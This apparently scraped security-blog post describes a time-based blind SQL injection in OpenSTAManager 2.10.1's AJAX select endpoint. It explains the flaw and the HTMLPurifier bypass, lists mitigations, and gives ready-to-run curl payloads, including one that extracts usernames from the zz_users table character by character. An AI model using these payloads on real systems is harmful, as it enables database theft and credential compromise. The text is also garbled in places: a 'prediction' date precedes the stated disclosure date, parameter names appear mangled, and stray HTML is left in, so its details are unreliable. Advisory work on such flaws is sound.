Listen to this Post
How the mentioned CVE works
The vulnerability exists in multiple AJAX select handlers due to unsafe concatenation of the `options
` GET parameter directly into SQL WHERE clauses. The `ajax_select.php` endpoint reads this parameter and passes it through <code>HTMLPurifier</code>, which only strips HTML tags and the `>` character but leaves SQL keywords (<code>SELECT</code>, <code>SLEEP</code>, <code>IF</code>, <code>UNION</code>) and operators (<code>=</code>, <code>(</code>, <code>)</code>) intact. The sanitized value is then assigned to `$superselect['stato']` and included in module-specific `select.php` files. In <code>preventivi/ajax/select.php</code>, the value is concatenated as <code>($stato = 1)</code>, allowing an attacker to break out of the expression. In <code>ordini/ajax/select.php</code>, it is inserted as a column name: <code>`or_statiordine`.$stato = 1</code>. In <code>contratti/ajax/select.php</code>, it is placed inside a subquery: <code>WHERE $stato = 1</code>. Because the input is not validated against an allowlist and is not parameterized, an authenticated attacker can inject time-based payloads like `1)+AND+(SELECT+SLEEP(10))-- -` to cause delays, extract database contents, or modify data via subqueries. HTMLPurifier’s stripping of `>` is bypassed using the `GREATEST()` function. The injection is blind, with results inferred from response timing differences. Platform: OpenSTAManager Version: 2.10.1 Vulnerability : Time-Based Blind SQLi Severity: High date: 2026-04-01 <h2 style="color: blue;">Prediction: 2025-05-15</h2> <h2 style="color: blue;">What Undercode Say:</h2> [bash] Time-based injection test for Preventivi module curl -k -X GET "https://target.com/ajax_select.php?op=preventivi&options[bash]=1&options[bash]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)+AND+(1" -b "PHPSESSID=<session>"
-- Vulnerable code snippet (modules/preventivi/ajax/select.php lines 59-60)
$stato = !empty($superselect['stato']) ? $superselect['stato'] : 'is_pianificabile';
$where[] = '('.$stato.' = 1)';
Exploit:
Extract first username character using time-based inference with GREATEST() curl -k -X GET "https://target.com/ajax_select.php?op=preventivi&options[bash]=1&options[bash]=1)+AND+(SELECT+1+FROM+(SELECT(IF((GREATEST(ASCII(SUBSTRING((SELECT+username+FROM+zz_users+LIMIT+0,1),1,1)),97)=ASCII(SUBSTRING((SELECT+username+FROM+zz_users+LIMIT+0,1),1,1))),SLEEP(5),0)))a)+AND+(1" -b "PHPSESSID=<session>"
Protection from this CVE
1. Apply allowlist validation for `stato` parameter.
2. Use regex `preg_match(‘/^[a-z_]+$/i’, $stato)` to restrict input.
3. Wrap column identifiers in backticks after sanitization.
Impact
- Confidentiality: Full database extraction including credentials.
- Integrity: Potential data modification via injected subqueries.
- Availability: Denial of service via long `SLEEP()` or heavy queries.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

